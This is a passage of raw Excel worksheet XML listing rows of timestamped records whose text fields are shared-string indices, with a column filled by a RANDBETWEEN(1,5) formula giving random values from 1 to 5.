      <c r="F19411">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19412" s="1">
        <v>43142.954027777778</v>
      </c>
      <c r="C19412" t="s">
        <v>10</v>
      </c>
      <c r="D19412" t="s">
        <v>1091</v>
      </c>
      <c r="E19412" t="s">
        <v>17415</v>
      </c>
      <c r="F19412">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19413" s="1">
        <v>43142.927071759259</v>
      </c>
      <c r="C19413" t="s">
        <v>140</v>
      </c>
      <c r="D19413" t="s">
        <v>141</v>
      </c>
      <c r="E19413" t="s">
        <v>17416</v>
      </c>
      <c r="F19413">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19414" s="1">
        <v>43142.914143518516</v>
      </c>
      <c r="C19414" t="s">
        <v>845</v>
      </c>
      <c r="E19414" t="s">
        <v>17412</v>
      </c>
      <c r="F19414">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19415" s="1">
        <v>43142.769768518519</v>
      </c>
      <c r="C19415" t="s">
        <v>140</v>
      </c>
      <c r="D19415" t="s">
        <v>141</v>
      </c>
      <c r="E19415" t="s">
        <v>17417</v>
      </c>
      <c r="F19415">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19416" s="1">
        <v>43142.724976851852</v>
      </c>
      <c r="C19416" t="s">
        <v>260</v>
      </c>
      <c r="F19416">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19417" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19417" s="1">
        <v>43142.673958333333</v>
      </c>
      <c r="C19417" t="s">
        <v>731</v>
      </c>
      <c r="D19417" t="s">
        <v>11</v>
      </c>
      <c r="E19417" s="2" t="s">
        <v>17418</v>
      </c>
      <c r="F19417">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19418" s="1">
        <v>43142.586712962962</v>
      </c>
      <c r="C19418" t="s">
        <v>344</v>
      </c>
      <c r="F19418">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19419" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19419" s="1">
        <v>43142.366400462961</v>
      </c>
      <c r="C19419" t="s">
        <v>318</v>
      </c>
      <c r="D19419" t="s">
        <v>46</v>
      </c>
      <c r="E19419" s="2" t="s">
        <v>17408</v>
      </c>
      <c r="F19419">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19420" s="1">
        <v>43142.304050925923</v>
      </c>
      <c r="C19420" t="s">
        <v>8364</v>
      </c>
      <c r="F19420">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19421" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19421" s="1">
        <v>43142.248611111114</v>
      </c>
      <c r="C19421" t="s">
        <v>197</v>
      </c>
      <c r="E19421" t="s">
        <v>17419</v>
      </c>
      <c r="F19421">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19422" s="1">
        <v>43142.154942129629</v>
      </c>
      <c r="C19422" t="s">
        <v>10</v>
      </c>
      <c r="D19422" t="s">
        <v>667</v>
      </c>
      <c r="E19422" t="s">
        <v>17420</v>
      </c>
      <c r="F19422">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19423" s="1">
        <v>43142.143240740741</v>
      </c>
      <c r="C19423" t="s">
        <v>10</v>
      </c>
      <c r="D19423" t="s">
        <v>667</v>
      </c>
      <c r="E19423" t="s">
        <v>17420</v>
      </c>
      <c r="F19423">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19424" s="1">
        <v>43142.105150462965</v>
      </c>
      <c r="C19424" t="s">
        <v>197</v>
      </c>
      <c r="E19424" t="s">
        <v>17421</v>
      </c>
      <c r="F19424">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19425" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19425" s="1">
        <v>43142.093032407407</v>
      </c>
      <c r="C19425" t="s">
        <v>197</v>
      </c>
      <c r="E19425" t="s">
        <v>17422</v>
      </c>
      <c r="F19425">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19426" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19426" s="1">
        <v>43142.041504629633</v>
      </c>
      <c r="C19426" t="s">
        <v>301</v>
      </c>
      <c r="D19426" t="s">
        <v>263</v>
      </c>
      <c r="E19426" t="s">
        <v>17423</v>
      </c>
      <c r="F19426">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19427" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19427" s="1">
        <v>43142.034571759257</v>
      </c>
      <c r="C19427" t="s">
        <v>318</v>
      </c>
      <c r="E19427" s="2" t="s">
        <v>17424</v>
      </c>
      <c r="F19427">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19428" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19428" s="1">
        <v>43141.979780092595</v>
      </c>
      <c r="C19428" t="s">
        <v>2138</v>
      </c>
      <c r="D19428" t="s">
        <v>6</v>
      </c>
      <c r="E19428" s="2" t="s">
        <v>17425</v>
      </c>
      <c r="F19428">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19429" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19429" s="1">
        <v>43141.809490740743</v>
      </c>
      <c r="C19429" t="s">
        <v>10</v>
      </c>
      <c r="D19429" t="s">
        <v>89</v>
      </c>
      <c r="E19429" t="s">
        <v>17426</v>
      </c>
      <c r="F19429">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19430" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19430" s="1">
        <v>43141.808356481481</v>
      </c>
      <c r="C19430" t="s">
        <v>4429</v>
      </c>
      <c r="D19430" t="s">
        <v>71</v>
      </c>
      <c r="E19430" s="2" t="s">
        <v>17427</v>
      </c>
      <c r="F19430">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19431" s="1">
        <v>43141.613171296296</v>
      </c>
      <c r="C19431" t="s">
        <v>10</v>
      </c>
      <c r="D19431" t="s">
        <v>151</v>
      </c>
      <c r="E19431" t="s">
        <v>17428</v>
      </c>
      <c r="F19431">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19432" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19432" s="1">
        <v>43141.539722222224</v>
      </c>
      <c r="C19432" t="s">
        <v>10</v>
      </c>
      <c r="D19432" t="s">
        <v>52</v>
      </c>
      <c r="E19432" t="s">
        <v>17429</v>
      </c>
      <c r="F19432">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19433" s="1">
        <v>43141.522499999999</v>
      </c>
      <c r="C19433" t="s">
        <v>10</v>
      </c>
      <c r="D19433" t="s">
        <v>151</v>
      </c>
      <c r="E19433" t="s">
        <v>17430</v>
      </c>
      <c r="F19433">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19434" s="1">
        <v>43141.493784722225</v>
      </c>
      <c r="C19434" t="s">
        <v>10</v>
      </c>
      <c r="D19434" t="s">
        <v>163</v>
      </c>
      <c r="E19434" t="s">
        <v>17431</v>
      </c>
      <c r="F19434">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19435" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19435" s="1">
        <v>43141.486064814817</v>
      </c>
      <c r="C19435" t="s">
        <v>1611</v>
      </c>
      <c r="D19435" t="s">
        <v>178</v>
      </c>
      <c r="E19435" t="s">
        <v>17432</v>
      </c>
      <c r="F19435">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19436" s="1">
        <v>43141.294039351851</v>
      </c>
      <c r="C19436" t="s">
        <v>41</v>
      </c>
      <c r="E19436" t="s">
        <v>17433</v>
      </c>
      <c r="F19436">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19437" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19437" s="1">
        <v>43141.29173611111</v>
      </c>
      <c r="C19437" t="s">
        <v>15594</v>
      </c>
      <c r="D19437" t="s">
        <v>271</v>
      </c>
      <c r="E19437" s="2" t="s">
        <v>17434</v>
      </c>
      <c r="F19437">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19438" s="1">
        <v>43141.275891203702</v>
      </c>
      <c r="C19438" t="s">
        <v>48</v>
      </c>
      <c r="E19438" t="s">
        <v>17435</v>
      </c>
      <c r="F19438">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19439" s="1">
        <v>43141.260208333333</v>
      </c>
      <c r="C19439" t="s">
        <v>7253</v>
      </c>
      <c r="E19439" t="s">
        <v>17436</v>
      </c>
      <c r="F19439">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19440" s="1">
        <v>43141.117534722223</v>
      </c>
      <c r="C19440" t="s">
        <v>8808</v>
      </c>
      <c r="D19440" t="s">
        <v>7</v>
      </c>
      <c r="E19440" t="s">
        <v>17437</v>
      </c>
      <c r="F19440">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19441" s="1">
        <v>43141.039351851854</v>
      </c>
      <c r="C19441" t="s">
        <v>8808</v>
      </c>
      <c r="D19441" t="s">
        <v>1056</v>
      </c>
      <c r="E19441" t="s">
        <v>17438</v>
      </c>
      <c r="F19441">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19442" s="1">
        <v>43140.984178240738</v>
      </c>
      <c r="C19442" t="s">
        <v>127</v>
      </c>
      <c r="D19442" t="s">
        <v>244</v>
      </c>
      <c r="E19442" t="s">
        <v>17439</v>
      </c>
      <c r="F19442">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19443" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19443" s="1">
        <v>43140.750462962962</v>
      </c>
      <c r="C19443" t="s">
        <v>10</v>
      </c>
      <c r="D19443" t="s">
        <v>52</v>
      </c>
      <c r="E19443" s="2" t="s">
        <v>17440</v>
      </c>
      <c r="F19443">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19444" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A19444" s="1">
        <v>43140.735312500001</v>
      </c>
      <c r="C19444" t="s">
        <v>9575</v>
      </c>
      <c r="D19444" t="s">
        <v>192</v>
      </c>
      <c r="E19444" s="2" t="s">
        <v>17441</v>
      </c>
      <c r="F19444">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19445" s="1">
        <v>43140.701597222222</v>
      </c>
      <c r="C19445" t="s">
        <v>6</v>
      </c>
      <c r="D19445" t="s">
        <v>25</v>
      </c>
      <c r="E19445" t="s">
        <v>17442</v>
      </c>
      <c r="F19445">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19446" s="1">
        <v>43140.677349537036</v>
      </c>
      <c r="C19446" t="s">
        <v>10</v>
      </c>
      <c r="D19446" t="s">
        <v>6</v>
      </c>
      <c r="F19446">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19447" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19447" s="1">
        <v>43140.671863425923</v>
      </c>
      <c r="C19447" t="s">
        <v>10</v>
      </c>
      <c r="D19447" t="s">
        <v>23</v>
      </c>
      <c r="E19447" s="2" t="s">
        <v>17443</v>
      </c>
      <c r="F19447">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19448" s="1">
        <v>43140.670011574075</v>
      </c>
      <c r="C19448" t="s">
        <v>10</v>
      </c>
      <c r="D19448" t="s">
        <v>52</v>
      </c>
      <c r="E19448" t="s">
        <v>757</v>
      </c>
      <c r="F19448">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19449" s="1">
        <v>43140.651539351849</v>
      </c>
      <c r="C19449" t="s">
        <v>10</v>
      </c>
      <c r="D19449" t="s">
        <v>158</v>
      </c>
      <c r="E19449" t="s">
        <v>17444</v>
      </c>
      <c r="F19449">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19450" s="1">
        <v>43140.651377314818</v>
      </c>
      <c r="C19450" t="s">
        <v>10</v>
      </c>
      <c r="D19450" t="s">
        <v>89</v>
      </c>
      <c r="E19450" t="s">
        <v>17445</v>
      </c>
      <c r="F19450">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19451" s="1">
        <v>43140.650775462964</v>
      </c>
      <c r="C19451" t="s">
        <v>6</v>
      </c>
      <c r="D19451" t="s">
        <v>114</v>
      </c>
      <c r="E19451" t="s">
        <v>17446</v>
      </c>
      <c r="F19451">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19452" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19452" s="1">
        <v>43140.649699074071</v>
      </c>
      <c r="C19452" t="s">
        <v>231</v>
      </c>
      <c r="D19452" t="s">
        <v>312</v>
      </c>
      <c r="E19452" s="2" t="s">
        <v>17447</v>
      </c>
      <c r="F19452">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19453" s="1">
        <v>43140.631284722222</v>
      </c>
      <c r="C19453" t="s">
        <v>10</v>
      </c>
      <c r="D19453" t="s">
        <v>20</v>
      </c>
      <c r="E19453" t="s">
        <v>17448</v>
      </c>
      <c r="F19453">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19454" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19454" s="1">
        <v>43140.629236111112</v>
      </c>
      <c r="C19454" t="s">
        <v>48</v>
      </c>
      <c r="E19454" s="2" t="s">
        <v>17449</v>
      </c>
      <c r="F19454">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19455" s="1">
        <v>43140.619467592594</v>
      </c>
      <c r="C19455" t="s">
        <v>6</v>
      </c>
      <c r="D19455" t="s">
        <v>25</v>
      </c>
      <c r="E19455" t="s">
        <v>17450</v>
      </c>
      <c r="F19455">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19456" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A19456" s="1">
        <v>43140.616620370369</v>
      </c>
      <c r="C19456" t="s">
        <v>6</v>
      </c>
      <c r="D19456" t="s">
        <v>194</v>
      </c>
      <c r="E19456" s="2" t="s">
        <v>17451</v>
      </c>
      <c r="F19456">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19457" s="1">
        <v>43140.603472222225</v>
      </c>
      <c r="C19457" t="s">
        <v>10</v>
      </c>
      <c r="D19457" t="s">
        <v>107</v>
      </c>
      <c r="E19457" t="s">
        <v>17452</v>
      </c>
      <c r="F19457">
        <f t="shared" ca="1" si="303"/>
        <v>4</v>
      </c>
    </row>
    <row r="19458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19458" s="1">
        <v>43140.596493055556</v>
      </c>
      <c r="C19458" t="s">
        <v>10</v>
      </c>
      <c r="D19458" t="s">
        <v>46</v>
      </c>
      <c r="E19458" t="s">
        <v>17453</v>
      </c>
      <c r="F19458">
        <f t="shared" ref="F19458:F19521" ca="1" si="304">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="19459" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A19459" s="1">
        <v>43140.560381944444</v>
      </c>
      <c r="C19459" t="s">
        <v>10</v>
      </c>
      <c r="D19459" t="s">
        <v>89</v>
      </c>
      <c r="E19459" s="2" t="s">
        <v>17454</v>
      </c>
      <c r="F19459">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19460" s="1">
        <v>43140.545266203706</v>
      </c>
      <c r="C19460" t="s">
        <v>10</v>
      </c>
      <c r="D19460" t="s">
        <v>94</v>
      </c>
      <c r="E19460" t="s">
        <v>17455</v>
      </c>
      <c r="F19460">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19461" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A19461" s="1">
        <v>43140.511157407411</v>
      </c>
      <c r="C19461" t="s">
        <v>10</v>
      </c>
      <c r="D19461" t="s">
        <v>6</v>
      </c>
      <c r="E19461" s="2" t="s">
        <v>17456</v>
      </c>
      <c r="F19461">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19462" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A19462" s="1">
        <v>43140.492638888885</v>
      </c>
      <c r="C19462" t="s">
        <v>10</v>
      </c>
      <c r="D19462" t="s">
        <v>244</v>
      </c>
      <c r="E19462" s="2" t="s">
        <v>17457</v>
      </c>
      <c r="F19462">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19463" s="1">
        <v>43140.482430555552</v>
      </c>
      <c r="C19463" t="s">
        <v>10</v>
      </c>
      <c r="D19463" t="s">
        <v>20</v>
      </c>
      <c r="E19463" t="s">
        <v>17458</v>
      </c>
      <c r="F19463">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19464" s="1">
        <v>43140.477662037039</v>
      </c>
      <c r="C19464" t="s">
        <v>10</v>
      </c>
      <c r="D19464" t="s">
        <v>36</v>
      </c>
      <c r="E19464" t="s">
        <v>17459</v>
      </c>
      <c r="F19464">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19465" s="1">
        <v>43140.473923611113</v>
      </c>
      <c r="C19465" t="s">
        <v>260</v>
      </c>
      <c r="E19465" t="s">
        <v>17460</v>
      </c>
      <c r="F19465">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19466" s="1">
        <v>43140.466053240743</v>
      </c>
      <c r="C19466" t="s">
        <v>410</v>
      </c>
      <c r="D19466" t="s">
        <v>271</v>
      </c>
      <c r="E19466" t="s">
        <v>10078</v>
      </c>
      <c r="F19466">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19467" s="1">
        <v>43140.462372685186</v>
      </c>
      <c r="C19467" t="s">
        <v>10</v>
      </c>
      <c r="D19467" t="s">
        <v>41</v>
      </c>
      <c r="E19467" t="s">
        <v>17461</v>
      </c>
      <c r="F19467">
        <f t="shared" ca="1" si="304"/>
        <v>5</v>
      </c>
    </row>
    <row r="19468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19468" s="1">
        <v>43140.430208333331</v>
      </c>
      <c r="C19468" t="s">
        <v>48</v>
      </c>
      <c r="E19468" t="s">
        <v>17462</v>
      </c>
      <c r="F19468">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19469" s="1">
        <v>43140.30400462963</v>
      </c>
      <c r="C19469" t="s">
        <v>127</v>
      </c>
      <c r="D19469" t="s">
        <v>178</v>
      </c>
      <c r="E19469" t="s">
        <v>17463</v>
      </c>
      <c r="F19469">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19470" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19470" s="1">
        <v>43140.301238425927</v>
      </c>
      <c r="C19470" t="s">
        <v>103</v>
      </c>
      <c r="E19470" s="2" t="s">
        <v>17464</v>
      </c>
      <c r="F19470">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19471" s="1">
        <v>43140.288958333331</v>
      </c>
      <c r="C19471" t="s">
        <v>41</v>
      </c>
      <c r="E19471" t="s">
        <v>17465</v>
      </c>
      <c r="F19471">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19472" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19472" s="1">
        <v>43140.278993055559</v>
      </c>
      <c r="C19472" t="s">
        <v>1510</v>
      </c>
      <c r="D19472" t="s">
        <v>1993</v>
      </c>
      <c r="E19472" s="2" t="s">
        <v>17466</v>
      </c>
      <c r="F19472">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19473" s="1">
        <v>43140.277951388889</v>
      </c>
      <c r="C19473" t="s">
        <v>229</v>
      </c>
      <c r="F19473">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19474" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19474" s="1">
        <v>43140.272881944446</v>
      </c>
      <c r="C19474" t="s">
        <v>623</v>
      </c>
      <c r="D19474" t="s">
        <v>107</v>
      </c>
      <c r="E19474" s="2" t="s">
        <v>17467</v>
      </c>
      <c r="F19474">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19475" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19475" s="1">
        <v>43140.262916666667</v>
      </c>
      <c r="C19475" t="s">
        <v>71</v>
      </c>
      <c r="E19475" s="2" t="s">
        <v>17468</v>
      </c>
      <c r="F19475">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19476" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19476" s="1">
        <v>43140.233865740738</v>
      </c>
      <c r="C19476" t="s">
        <v>1077</v>
      </c>
      <c r="D19476" t="s">
        <v>46</v>
      </c>
      <c r="E19476" s="2" t="s">
        <v>17469</v>
      </c>
      <c r="F19476">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19477" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19477" s="1">
        <v>43140.227060185185</v>
      </c>
      <c r="C19477" t="s">
        <v>471</v>
      </c>
      <c r="E19477" s="2" t="s">
        <v>17470</v>
      </c>
      <c r="F19477">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19478" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19478" s="1">
        <v>43140.203321759262</v>
      </c>
      <c r="C19478" t="s">
        <v>1510</v>
      </c>
      <c r="D19478" t="s">
        <v>194</v>
      </c>
      <c r="E19478" s="2" t="s">
        <v>17471</v>
      </c>
      <c r="F19478">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19479" s="1">
        <v>43140.160324074073</v>
      </c>
      <c r="C19479" t="s">
        <v>118</v>
      </c>
      <c r="E19479" t="s">
        <v>17472</v>
      </c>
      <c r="F19479">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19480" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A19480" s="1">
        <v>43140.145277777781</v>
      </c>
      <c r="C19480" t="s">
        <v>461</v>
      </c>
      <c r="E19480" s="2" t="s">
        <v>17473</v>
      </c>
      <c r="F19480">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19481" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19481" s="1">
        <v>43140.088819444441</v>
      </c>
      <c r="C19481" t="s">
        <v>140</v>
      </c>
      <c r="D19481" t="s">
        <v>46</v>
      </c>
      <c r="E19481" s="2" t="s">
        <v>17474</v>
      </c>
      <c r="F19481">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19482" s="1">
        <v>43140.060057870367</v>
      </c>
      <c r="C19482" t="s">
        <v>140</v>
      </c>
      <c r="D19482" t="s">
        <v>141</v>
      </c>
      <c r="E19482" t="s">
        <v>17475</v>
      </c>
      <c r="F19482">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19483" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19483" s="1">
        <v>43140.05400462963</v>
      </c>
      <c r="C19483" t="s">
        <v>43</v>
      </c>
      <c r="E19483" s="2" t="s">
        <v>17476</v>
      </c>
      <c r="F19483">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19484" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19484" s="1">
        <v>43139.971875000003</v>
      </c>
      <c r="C19484" t="s">
        <v>10</v>
      </c>
      <c r="D19484" t="s">
        <v>107</v>
      </c>
      <c r="E19484" s="2" t="s">
        <v>17477</v>
      </c>
      <c r="F19484">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19485" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19485" s="1">
        <v>43139.955868055556</v>
      </c>
      <c r="C19485" t="s">
        <v>1510</v>
      </c>
      <c r="D19485" t="s">
        <v>112</v>
      </c>
      <c r="E19485" s="2" t="s">
        <v>17478</v>
      </c>
      <c r="F19485">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19486" s="1">
        <v>43139.949166666665</v>
      </c>
      <c r="C19486" t="s">
        <v>73</v>
      </c>
      <c r="E19486" t="s">
        <v>17479</v>
      </c>
      <c r="F19486">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19487" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19487" s="1">
        <v>43139.927569444444</v>
      </c>
      <c r="C19487" t="s">
        <v>1510</v>
      </c>
      <c r="D19487" t="s">
        <v>721</v>
      </c>
      <c r="E19487" s="2" t="s">
        <v>17480</v>
      </c>
      <c r="F19487">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19488" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19488" s="1">
        <v>43139.874618055554</v>
      </c>
      <c r="C19488" t="s">
        <v>1510</v>
      </c>
      <c r="D19488" t="s">
        <v>20</v>
      </c>
      <c r="E19488" s="2" t="s">
        <v>17481</v>
      </c>
      <c r="F19488">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19489" s="1">
        <v>43139.858078703706</v>
      </c>
      <c r="C19489" t="s">
        <v>10</v>
      </c>
      <c r="D19489" t="s">
